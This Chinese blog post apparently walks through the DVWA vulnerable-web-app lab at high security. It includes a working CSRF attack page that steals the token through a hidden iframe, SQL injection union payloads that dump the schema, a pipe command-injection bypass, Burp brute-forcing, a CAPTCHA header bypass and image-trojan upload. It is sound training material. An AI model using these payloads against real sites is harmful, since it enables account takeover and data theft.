dvwa靶场

最新推荐文章于 2024-05-30 11:05:50 发布
最新推荐文章于 2024-05-30 11:05:50 发布
阅读量2.8k 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nidaxin/article/details/122890753
版权

目录

brute force(high)暴力破解

command injection(high)

file inclusion(high)

 file upload(high)

 insecure CAPTCHA(high)

 SQL injection(high)

brute force(high)暴力破解

使用了随机token机制来防止CSRF【跨站请求伪造】

Token是服务端生成的一串字符串,当客户端第一次登录后,服务器生成一个Token便将此Token返回给客户端,以后客户端只需带上这个Token前来请求数据即可,无需再次带上用户名和密码。

抓包发现验证了三个参数:用户名、密码、token

 在bp里面爆破,选择pichfork模式

recursive_Grep:表示将服务器每次返回的数据来替换payload中的变量值,这里用来每次替换user_token的值

 选中服务器返回的token,表示每次从响应中获取该值

grep_extract:意思是用于提取响应消息中的有用信息

 在recursive_Grep模式下只能用单线程,最后再把option里面的redirections设置为always

 点击爆破

 很明显,密码就是password,token就是value

command injection(high)

命令连接符:&   &&  ||    |

 |[管道符]:将前者处理的结果作为参数传给后者,并且只打印后者执行的结果

替换字符串时替换的是“| ”有空格,所以单独的|管道符可以出现在IP中:即command1|command2

CSRF(high)

写一个如下攻击脚本,后缀为html,打开后后,在靶场里面点击提交,就会回显password changed,表明密码已经改了

脚本作用:当受害者点进这个页面,脚本会通过一个隐藏框架偷偷访问修改密码的页面,获取页面完整的token,向服务器发送改密请求,完成csrf攻击

<script type="text/javascript">

    function attack()

  {

   document.getElementsByName('user_token')[0].value=document.getElementById("hack").contentWindow.document.getElementsByName('user_token')[0].value;

  document.getElementById("transfer").submit(); 

  }

</script>



<iframe src="http://dvwa-master/vulnerabilities/csrf/" id="hack" border="0" style="display:none;">

</iframe>



<body onload="attack()">

  <form method="GET" id="transfer" action="http://dvwa-master/vulnerabilities/csrf/">

   <input type="hidden" name="password_new" value="password">

    <input type="hidden" name="password_conf" value="password">

   <input type="hidden" name="user_token" value="">

  <input type="hidden" name="Change" value="Change">

   </form>

</body>

 

file inclusion(high)

文件包含的利用:利用相对路径或者绝对路径来读取文件

fnmatch():匹配函数,可匹配文件名或者路径名

 !fnmatch( "file*", $file ) && $file != "include.php":要求传进去的参数必须必须以filexxxxx开头,才能通过验证去包含相应文件,file协议可以访问本地文件,就构造url访问本地文件


File Inclusion Source
<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}

?>

 

再尝试用绝对路径读取文件,报错上面就有绝对路径

 

 file upload(high):

getimagesize():将测定任何GIF、jpg、png…………的图像文件的大小,并返回图像的尺寸以及文件类型和一个可用于普通html文件中IMG标记中的height/width文本字符串,如果不能访问filename指定的图像或者其不是有效图像,getimagesize()将返回false,故getimagesize()主要是用于判断上传文件是不是有效的图片

 制作木马图片绕过

图片木马原理:图片木马以文件上传漏洞为基本条件,将可执行的脚本写入到图片中去,再利用文件包含漏洞来执行图片中的一句话木马,从而获取目标服务器权限。

 

 insecure CAPTCHA(high)

 if( !$resp->is_valid && ( $_POST[ 'recaptcha_response_field' ] != 'hidd3n_valu3' || $_SERVER[ 'HTTP_USER_AGENT' ] != 'reCAPTCHA' ) ) {
        // What happens when the CAPTCHA was entered incorrectly
        $html     .= "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>"

与中级最大的区别:看$resp【这里指谷歌返回的验证结果】不正确且参数recaptcha_response_field的值是否是hidd3n_valu3和http包头的user agent[HTTP_USER_AGEN]是否等于reCAPTCHA,若相等,则验证通过,$resp我们无法控制故要修改两个参数的值使其匹配,抓包

 

 SQL injection(high)

比中级多了一个limit 1,限制只能输出一条,可以用#注释掉

 判断注入类型:很明显是字符型注入

 获取字段数:order by数字#             字段数是2

获取版本和数据库库名   库名:database

 获取数据库中的表名:1' union select 1,table_name from information_schema.tables where table_schema='dvwa'#

查列名:1’ union select1,group_concat(column_name)from information_schema.columns where table_name='users'#

获取表中信息

 

蓝色满天星星星
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DVWA靶场
chenjyboke的博客
02-18 4165
XSS(跨站脚本攻击) DOM型 low 在url输入选择的语言,查看执行的内容 发现会发生改变,可以往后面写脚本,添加一个脚本运行 <script>alert('123')</script> <script> 标签用于定义客户端脚本,比如 JavaScript。 script 元素既可以包含脚本语句,也可以通过 src 属性指向外部脚本文件。 必需的 type 属性规定脚本的 MIME 类型。 js标签,alert是弹出一个窗口的意思,如al
国内外黑客居然都在这些地方聚集
学习交流群:921427443
05-29 4748
1.track黑客导航 导航Track黑客导航 黑客导航,含有众多网安一行的官方网站及平台 无论你是老鸟还是萌新,都可以找得到对应适合的文章! 2.封神台靶场 封神台 - 掌控安全在线演练靶场,是一个在线黑客攻防演练平台。 在线练习靶场,是一个在线黑客攻防演练平台! 在成长的道路上怎么能缺少打怪刷级的乐趣呢! 但是市面上的网站漏洞组成复杂,而且会有法律风险,想要技术,封神台靶场是一个好的选择 3.黑客社区 Track 安全社区 - 掌控安全在线教育 Track_黑客_社区-追随黑客
DVWA网络安全靶场搭建与练习 附攻略和在线
01-02
网络安全靶场搭建与练习附攻略和在线
Damn Vulnerable Web Application (DVWA) 在线演练靶机地址
Ambulong的博客
06-04 1万+
https://www.vulnspy.com/?u=dvwa/damn_vulnerable_web_application_(dvwa)Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for securit...
DVWA靶场搭建:Apache、MySQL、PHP、DVWA
最新发布
ryan007liu的专栏
05-30 1339
dvwa环境搭建,安全测试学习平台
DVWA靶场练习
农夫果园好好喝的博客
05-18 1211
1 SQL 注入 1.1 SQL注入介绍 SQL injection,即SQL注入,攻击者在 WEB 表单或者页面请求的查询字符串中通过注入恶意的 SQL 命令,从而使数据库执行恶意的 SQL 语句 1.2 漏洞出现的场景 此漏洞通常出现在如下场景: WEB表单提交 域名 1.3 注入思路 1.判断是否存在注入,注入类型是字符型、数字型还是搜索性型。 2.猜解 SQL 查询语句中的字段数。 3.确定显示的字段顺序。 4.获取当前的数据库。 5.获取当前数据库中的表 6.获取表中的字段名。 7.查询数据 gr
kali2021.3安装dvwa靶场
02-24
标题中的“kali2021.3安装dvwa靶场”是指在Kali Linux 2021.3版本中安装DVWA(Damn Vulnerable Web Application)的过程,这是一个广泛用于Web安全学习和实践的模拟靶场。描述中提到,这个教程是为刚接触Kali的爱好...
DVWA靶场源码分享
12-11
DVWA靶场提供了各种级别的漏洞,从低到高,让使用者能够逐步挑战并了解如何发现和修复这些漏洞。 在“DVWA靶场源码分享”中,你将获得DVWA的源代码,这将允许你在本地环境中设置和运行这个应用。这样,你就可以在...
DVWA靶场环境搭建-dvwa.rar
10-15
DVWA靶场环境文件
DVWA靶场搭建与使用
09-02
**DVWA靶场搭建与使用** DVWA(Damn Vulnerable Web Application)是一个开源的Web应用程序,专门为网络安全专业人员、开发人员和学生设计,用于学习和练习常见Web应用漏洞的识别和利用。它提供了多种安全漏洞的...
dvwa靶场训练.rar
03-17
DVWA靶场训练——新手入门Web安全与渗透测试指南》 DVWA(Damn Vulnerable Web Application)是一款专为Web安全学习和渗透测试设计的开源靶场,它提供了各种典型的Web应用程序安全漏洞,帮助初学者了解和实践网络...
DVWA模块使用教程(二)
Estrus5的博客
04-30 4443
一、Brute Force使用 1、打开Brute Force界面,测试登陆框是否存在注入,提交敏感字符测试程序是否报错。在登录界面上输入用户名admin’(使用敏感字符‘)。 会弹出如下界面 2、仔细观察登录系统时地址栏中的sql语句,在用户名密码提交界面上通过注入逻辑语句使登录判断失效,进入受保护页面。(这样可以不使用密码就可以直接登录啦!) 二、Command Injection命令注入 1、打开Command Injection界面,在该界面提供一个命令行执行环境,输入ip地址返回ping命令的
【网络安全DVWA靶场实战&BurpSuite内网渗透
九芒星的博客
07-22 4820
借助DVWA靶场,对用户登录进行渗透测试
渗透初识之DVWA靶场搭建及使用(详细图文)
热门推荐
m0_60884805的博客
09-28 2万+
我将环境搭在win7,漏洞环境建议还是在虚拟机上搭建。
DvwaDvwa连接phpMyAdmin,在线管理并查看Dvwa后台数据库
share something here
03-22 2364
DvwaDvwa连接phpMyAdmin,在线管理查看后台数据库登录小皮面板选中Dvwa所在的站点,点击确认安装成功后,点击管理登录查看Dvwa数据库信息 登录小皮面板 从小皮面板,进入软件管理,找到phpMyAdmin,点击安装 选中Dvwa所在的站点,点击确认 等待安装 安装成功后,点击管理 登录 进入到主界面 登录后台数据库使用的默认账号密码是root root 查看 Dvwa数据库信息 可以看到有两张表,一张是guestbook,存储的是存储型XSS部分下的留言内容。第二个users存
靶场搭建】超级详细——DVWA靶场搭建(婴儿级教程)
KKleeeaa的博客
03-04 3294
首先你得有一个,搭建网站的一个软件,这里我推荐小皮面板,它的安装方式简单,搭建也很容易,对于新手来说是个比较好的一个软件。小皮面板官方网站为,请选择适合你的版本进行安装,我这里给你们演示的是Windows版本的小皮面板。随后点击网站,创建一个新网站,也可以直接用现成的,这里演示创建网站教程。点击刚刚创建好的网站的管理,然后打开跟目录,把DWVA文件解压到这里来。有什么疑难杂症请 截图评论一下 博主会第一时间给你解决哦。他的官方github在这里,中文版的。一键启动 WNMP 蓝色表示启动成功。
DVWA平台搭建+SQL注入实验详解
二狗的博客
04-04 5990
实现DVWA平台的搭建,为后续的SQL注入提供练习环境;进行SQL注入的练习,目的是了解因web应用程序对用户输入数据的合法性没有判断或过滤不严,而造成的危害,以便后续更好地掌握对其的防御手段,提高网络安全意识;
如何搭建 DVWA 靶场保姆级教程(附链接)
Flag少侠的博客
01-28 1万+
如何搭建 DVWA 靶场保姆级教程(附链接)
dvwa靶场xss攻击
09-25
DVWA靶场是一个用于学习和测试网络安全漏洞的虚拟环境。在DVWA靶场中,有一个特定的漏洞被称为XSS(跨站脚本攻击)。XSS攻击是一种利用网页应用程序对用户输入的处理不当而进行的攻击。通过在受害者浏览器中执行恶意脚本,攻击者可以窃取用户的敏感信息、劫持用户会话或者操纵网页内容。 在DVWA靶场中,有两种XSS攻击方式:存储型XSS和反射型XSS。存储型XSS攻击是指攻击者将恶意代码嵌入到后台服务器的存储区域,当其他用户访问这个页面时,恶意代码就会被执行。而反射型XSS攻击是通过欺骗用户点击一个包含恶意代码的链接来实现攻击。 要在DVWA靶场中进行XSS攻击,可以按照以下步骤进行: 1. 首先,需要确定XSS漏洞的存在,可以通过尝试在输入框中插入一些特殊字符或标签,如<script>标签,来判断是否能成功执行恶意代码。 2. 如果成功执行了恶意代码,可以尝试构造payload来获取用户的cookie等敏感信息。 3. 进一步,可以尝试利用XSS漏洞来进行会话劫持或者篡改网页内容。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值